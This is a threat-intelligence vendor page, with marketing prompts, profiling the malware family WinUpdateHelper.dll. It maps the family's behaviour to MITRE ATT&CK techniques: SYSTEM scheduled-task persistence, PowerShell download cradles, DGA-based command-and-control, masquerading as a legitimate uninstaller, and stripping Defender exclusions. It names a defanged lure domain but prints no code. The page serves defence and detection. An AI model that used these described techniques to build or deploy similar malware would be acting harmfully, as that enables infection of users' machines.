Malware

WinUpdateHelper.dll

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

MITRE ATT&CK

Techniques & procedures

7 distinct techniques documented for this family, organized by ATT&CK tactic.

Execution

3 techniques

T1053.005Scheduled TaskEvidence1

MITRE ATT&CK: T1053.005 -- Scheduled Task/Job: Scheduled Task ... This creates a scheduled task running as SYSTEM at startup

T1059.001PowerShellEvidence1

MITRE ATT&CK: T1059.001 -- Command and Scripting Interpreter: PowerShell ... Launches two parallel PowerShell download cradles using the DGA domain

T1204.002Malicious FileEvidence1

MITRE ATT&CK: T1204.002 -- User Execution: Malicious File ... The infection begins with a social engineering lure ... directing victims to getthishusd[.]live ... When the gate validates the parameters, it issues an HTTP 302 redirect ... dynamically generates a 9.4 MB ZIP archive

Persistence

1 technique

T1053.005Scheduled TaskEvidence1

MITRE ATT&CK: T1053.005 -- Scheduled Task/Job: Scheduled Task ... This creates a scheduled task running as SYSTEM at startup

Privilege Escalation

1 technique

T1053.005Scheduled TaskEvidence1

MITRE ATT&CK: T1053.005 -- Scheduled Task/Job: Scheduled Task ... This creates a scheduled task running as SYSTEM at startup

Stealth

1 technique

T1036.005Match Legitimate Resource Name or LocationEvidence1

MITRE ATT&CK: T1036.005 -- Masquerading: Match Legitimate Name or Location ... The DLL is a trojanized component of the legitimate BCUninstaller ... retains the original metadata

Command and Control

2 techniques

T1071.001Web ProtocolsEvidence1

MITRE ATT&CK Mapping ... T1071.001 Application Layer Protocol: Web Protocols HTTP-based C2 communication

T1568.002Domain Generation AlgorithmsEvidence1

MITRE ATT&CK: T1568.002 -- Dynamic Resolution: Domain Generation Algorithms ... the DGA formula computes the active C2 domain using nothing more than the current Unix timestamp

Other

1 technique

T1562.001Disable or Modify ToolsEvidence1

MITRE ATT&CK: T1562.001 -- Impair Defenses: Disable or Modify Tools ... This first strips all existing Defender exclusions, then adds five attacker-controlled exclusion paths

ACTIVITY FEED

Recent activity

1 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

1 SOURCESView more in app

cyber security newsNews

Mar 19, 2026

‘Vibe-Coded’ Malware Campaign Uses Fake Tools, CDNs and File Hosts to Infect Users

A malicious DLL used as the core infection component in a large-scale campaign. It is side-loaded from trojanized ZIP archives, redirects victims to a fake dependency download, establishes persistence via a Windows service, contacts dynamically generated C2 infrastructure, executes PowerShell in memory, adds Defender exclusions, and deploys coin miners or additional payloads.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping7

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.